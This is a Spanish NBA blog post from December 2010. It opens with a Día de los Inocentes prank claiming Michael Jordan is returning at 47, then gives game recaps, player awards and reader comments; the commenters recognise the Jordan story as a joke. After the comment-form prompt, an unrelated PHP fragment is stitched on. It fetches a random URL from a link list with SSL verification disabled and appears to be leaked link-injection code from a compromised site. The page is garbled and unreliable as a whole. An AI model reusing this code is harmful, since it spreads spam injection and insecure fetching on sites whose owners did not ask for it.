La Crónica (27/12/10): ¿Vuelve Michael Jordan?

28 de December de 2010 por txusma

La mala marcha del equipo, sin líder tras la huída de su entrenador, Larry Brown, parece haber empujado a Michael Jordan a volver a plantearse por tercera vez su regreso a las canchas. A sus 47 años, el considerado por muchos “el mejor jugador de la historia” podría vestirse de corto de nuevo sobretodo para motivar a sus jugadores, más que para convertirse él mismo en referencia ofensiva y estrella indiscutible. Como el propio Jordan ha declarado “el cuerpo ya no es el que era pero aún puedo dar alguna que otra lección”. Yo no sé vosotros, pero yo ya estoy salivando.

Por lo que respecta a la jornada en sí, si es que alguien le interesa después del shock, hemos de decir que pudimos contemplar 10 partidos de todos los colores y olores.

Empezamos con la tercera victoria consecutiva de Orlando, esta vez sobre los Nets y con una gran actuación de Turkoglu (104-88). Parece que el volver a casa le ha devuelto las ganas de jugar a baloncesto.

Debutó Paul Silas como técnico de Charlotte y, vaya hombre, parece que sí son capaces de pasar con comodidad de los 100 puntos (100-105). No es que Augustin estuviera jugando mal esta campaña, pero ayer la armó con una frescura como nunca le habíamos visto. Menos mal porque con los guarismos habituales no hubieran logrado doblegar a unos Pistons combativos. ¿Sienten ya el aliento de Jordan en el cogote?

Los Hawks ganaron sobrados a Milwaukee (95-80), pero los Hornets se llevaron una dolorosa paliza del Target Center de Minneapolis (98-113) con Beasley superlativo rozando el triple doble. Dallas también ganó en la difícil cancha de Oklahoma a pesar de perder a Dirk con un esguince en el segundo cuarto. Sus compañeros lo hicieron francamente bien (93-103).

En el duelo español del día, Memphis ganó a Toronto, 85-96, gracias entre otras cosas a un increíble 5 de 14 en tiros libres de los canadienses, además de 25 pérdidas, 23 faltas cometidas y un lamentable acierto exterior. El choque lo ganó el menos malo, porque los “osetes” también se lucieron con las pérdidas y los tiros de tres… pero al menos metieron los muchos libres que disfrutaron. Partido de patio de colegio.

Si los Blazers ponen un circo les crecen los enanos. Anoche alarma roja cuando Camby se retiró lesionado en Salt Lake City. Por suerte Aldridge se vistió de Olajuwon al poste y le hizo un roto a Al Jefferson de los que duelen. Miller, Matthews y Rudy le arroparon bien y lograron una victoria dificilísima y valiosísima (96-91). Parece que ya les resbala tanta desgracia.

Para terminar, victoria trabajada de Houston ante Washington (93-100), también de los Clippers ante los Kings con el mejor Tyreke del curso (100-99) y de Golden State recibiendo a los Sixers (95-110).

PREMIOS

MVP: Pues parece que va en serio. Finalmente Michael Beasley nos está mostrando toda la calidad que se le suponía cuando fue elegido nº 2 del draft por detrás de Derrick Rose. Anoche fulminó a los Hornets con 30 puntos, 9 rebotes y 7 asistencias. Imparable.

Rookie: Un doble-doble más para Blake Griffin (24-14). Y en Minnesota, un rookie más terrenal como Wes Johnson anotó 23 puntos y repartió 3 asistencias.

Sorpresa: En Golden State lo difícil es no destacar pero ver como un jugador que no era nadie en Miami se convierte en una de las principales referencias ofensivas de una franquicia NBA resulta sorprendente. Ayer Dorell Wright fue el mejor de su equipo con 28 puntos, 4 rebotes y 6 asistencias.

Decepción: Chris Douglas-Roberts está tirando por la borda la oportunidad que se le presenta en Milwaukke. Desde que es titular sólo ha encadenado desastre tras desastre.

Esfuerzo en vano: Ante el empuje de Beasley y los suyos, los 22 puntos, 6 rebotes, 13 asistencias y 5 robos de Chris Paul se quedaron en nada. Porca miseria.

Comenta

16 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    28-12-2010

      Citar

  2. Busky23 dice:
    #2

    Me pongo de pie…
    Vuelve su majestad????,para motivar???47 años???,muy surrealista todo… no seré yo quien le lleve la contraria al MEJOR deportista de todos los tiempos pero creo que volver a las canchas con esa edad me parece una broma. Que los motive y de clinics en los entrenamientos o monte de una vez un equipo en condiciones,eso seria lo más lógico.
    No creo que nadie que haya sido seguidor del 23( yo empece a ver NBA gracias a él hace ya más de 20 años) le apetezca verlo en una cancha a día de hoy.
    Todo tiene su momento y el suyo lamentablemente llego hace ya tiempo.
    Eso si,este tiene licencia para hacer lo que le de la gana.
    Dios salve al rey.

      Citar

  3. Busky23 dice:
    #3

    Por cierto,después de que Phil Jackson le estuviera dando 6 minutitos por partido los Lakers han enviado al rookie Ebanks a la liga de desarrollo para que el chaval se desfogue un poquito.

      Citar

  4. rojorob dice:
    #4

    Me comunican mis agentes USA que Doc Rivers le ha ofrecido a Bill Russell un puesto en la plantilla. En principio sería sólo para completar los entrenamientos, pero si se repiten las lesiones de Shaq podría participar en algún partido, sobre todo con vistas a play-offs…Cachondos.

      Citar

  5. Sancho88 dice:
    #5

    Sí, si, pero más de uno y de dos nos lo hemos zampao con patatas fritas lo de ‘Air’. jeje, ha sido una muy buena broma chicos. seguid asi! el augustine, ese hombre tiene muy buena mano desde fuera, y claro, lo pones de uno y lo matas, porque solo sube la bola, pasa y corta. asi imposible sacarle nada. ayer, le dirian, tio juegate tus tiros y el xaval lo hizo. que ademas, en casa, como cuando mete un triple se cae el estadio porque no estan acostumbrados… pues supongo que se sentira mas motivado.

    y bueno, los Kings contra los Clippers. No se por que, esos tios siempre nos ganan en partidos muy apretado. lo de westphal ya huele, aunque supongo que es lo que se comenta, tienen una crisis muy gorda. por muy raro que suene, a Sacramento no le vendria nada mal un hombre como Larry Brown, ahora que esta sin equipo. porque los Kings no hacen una defensa seria contra nadie y por eso siempre pierden los patidos. Así que, esat vez Tyreke tambien opta al mayor esfuerzo en vano, creo. por cierto, esa espantada que comentais de Larry, por que ha sucedido? si tan buen royo tenia con MJ… no cuadra verdad? sera porque esta ya mayor no?

      Citar

  6. Ru dice:
    #6

    Yo reconozco que he ido a mirar a Hoopshype en rumores…xDDD

      Citar

  7. KB # 24 dice:
    #7

    jajajaj feliz día de los inocentes! jajaja

      Citar

  8. Denise dice:
    #8

    JA JA que bueno lo de Jordan Más de uno se lo ha tragado JAJA 🙂
    Me está sorprendiendo para bien Turkoglu, está jugando a buen nivel, y está volviendo a ser el Turkoglu que jugaba en los Magic y no el penoso jugador que se arrastraba con la camiseta de los Raptors y de los Suns.
    También me sorpende que Arenas esté saliendo desde el banco y jugando tan poco.

      Citar

  9. xapa_croack dice:
    #9

    los clippers 9-9 en los ultimos 18, después del 1-13, no esta nada mal, griffin vaya animal.

      Citar

  10. sergio dice:
    #10

    Yo me lo estaba tragando del todo…. Menos mal que he visto que el tio del entrenamiento es Jason Richardson (si no me equivoco) jajajajaj. Mucho ha llovido desde entonces. Aunque no me parece mala idea eso de tirarse unos tiritos con ellos en los entrenamientos y unas charlas motivadoras. A mi MJ me da una charla y te aseguro que mientras me acuerde tengo nivel NBA….

      Citar

  11. sergio dice:
    #11

    Y si… lo de Griffin es terrible. 19 dobles-dobles consecutivos y solo 3 partidos por debajo de 20 puntos. Incluyeno victorias ante Bulls, Spurs y Hornets

      Citar

  12. Busky23 dice:
    #12

    Joder este Txusma,me la ha metido doblada jajaja,yo es que de Jordan ya me lo creo todo,hasta eso.
    Griffin,Griffin y que pasa con Gordon???
    Hoy Rudy enchufadisimo hasta que el bueno del gordito lo ha mandado al banquillo por Batum,defensa que no falte,eso si,victoria de mucho mérito en terreno de Utah

      Citar

  13. cocinitas dice:
    #13

    cuidadin con clippers que si siguen a este ritmo le dan un susto a cualquiera, un traspaso de baron davis por un buen base y podrian hacer algo serio esta misma temporada.

      Citar

  14. Txusma dice:
    #14

    No es acaso Baron Davis un buen base cuando está centrado? (y ahora parece que lo está).

    La posición de 3 tb parece muy floja. Ryan Gomes está de titular de manera sorprendente pq Aminu tampoco lo hizo mal del todo, no?

      Citar

  15. Juan dice:
    #15

    ¿Cambiamos links?

    http://comojuega.wordpress.com/

    Avisame y te agrego…

    SALUDOS!

      Citar

  16. Txusma dice:
    #16

    Tu enlace ya está publicado.
    Por cierto, aprovecho por recomendarles a todos que lo visiten. Tremendo trabajao y tremenda fuente de información.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>